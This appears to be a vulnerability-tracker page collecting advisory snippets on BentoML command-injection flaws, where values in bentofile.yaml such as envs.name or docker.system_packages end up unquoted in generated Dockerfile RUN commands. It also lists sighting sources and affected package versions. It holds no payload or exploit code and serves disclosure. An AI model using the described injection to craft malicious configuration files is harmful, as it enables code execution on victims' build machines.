GHSA-W2PM-X38X-JP44 Dockerfile command injection via envs[*].name in bentofile.yaml (sibling fix-bypass of CVE-2026-33744 and CVE-2026-35043)

BentoML envs.name Dockerfile command injection — sibling of CVE-2026-33744 / CVE-2026-35043 A malicious bentofile.yaml containing a newline-injected value in envs.name produces unquoted RUN directives in the BentoML-generated Dockerfile. When the victim runs bentoml containerize on the imported...

CVE-2026-33744

creationtimestamp| type| source ---|---|--- 2026-03-27 03:18:12+00:00| seen| Telegram/wovzpCQvp7hlTQxwTsDEYFJDESQHFA6mVe176dFHuk85of0 2026-04-01 16:40:10+00:00| seen| https://bsky.app/profile/cyberhub.blog/post/3mih4ydsaer23...

CVE-2026-33744

BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Prior to 1.4.37, the docker.systempackages field in bentofile.yaml accepts arbitrary strings that are interpolated directly into Dockerfile RUN commands without sanitization. Since...

ai-dynamo (=0.1.0), bento2seldon (>=0.1.0 <=0.4.0) +16 more potentially affected by CVE-2026-33744 via bentoml (>=0.10.1 <=1.4.3)

bentoml PYPI version =0.10.1, =0.1.0, =0.1.0, =0.0.10, =0.0.5, =0.3.12, =0.0.1, =1.0.3, =0.0.10, =0.0.1, =0.0.1, =0.0.13 and more Source cves: CVE-2026-33744 Source advisory: OSV:PYSEC-2026-157...

CVE-2026-33744

CVE-2026-33744 affects BentoML versions prior to 1.4.37. The issue arises when the docker.system_packages field in bentofile.yaml is interpolated into Dockerfile RUN commands without sanitization, allowing arbitrary shell commands to execute during bentoml containerize or docker build. Impact is ...